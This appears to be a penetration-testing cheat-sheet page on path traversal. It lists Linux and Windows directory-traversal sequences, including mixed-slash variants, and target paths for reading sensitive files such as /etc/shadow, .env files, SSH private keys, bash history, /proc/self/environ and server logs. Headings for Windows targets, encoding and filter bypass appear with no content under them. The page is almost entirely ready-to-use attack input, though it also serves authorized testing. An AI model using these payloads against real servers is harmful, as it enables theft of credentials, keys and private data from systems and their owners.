Page cover

Path Traversal

Linux Traversal
../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
Windows Traversal
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\/
..\/..\
..\/..\/
..\/../
../\..\
Common Target Files - Linux
System Files
../../../etc/passwd
../../../etc/shadow
../../../etc/group
../../../etc/hosts
../../../etc/hostname
../../../etc/issue
../../../etc/motd
../../../etc/mysql/my.cnf
../../../etc/ssh/sshd_config
../../../etc/apache2/apache2.conf
../../../etc/nginx/nginx.conf
Application Configuration
../../../var/www/html/config.php
../../../var/www/html/.env
../../../home/user/.ssh/id_rsa
../../../home/user/.ssh/authorized_keys
../../../home/user/.bash_history
../../../home/user/.bashrc
../../../root/.ssh/id_rsa
Log Files
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../var/log/auth.log
../../../var/log/syslog
../../../var/log/messages
../../../var/log/secure
../../../var/log/mail.log
Proc Filesystem
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/self/status
../../../proc/self/fd/0
../../../proc/self/fd/1
../../../proc/version
../../../proc/cpuinfo
../../../proc/net/arp
../../../proc/net/tcp
Common Target Files - Windows
Encoding Techniques
Bypassing Filters

Last updated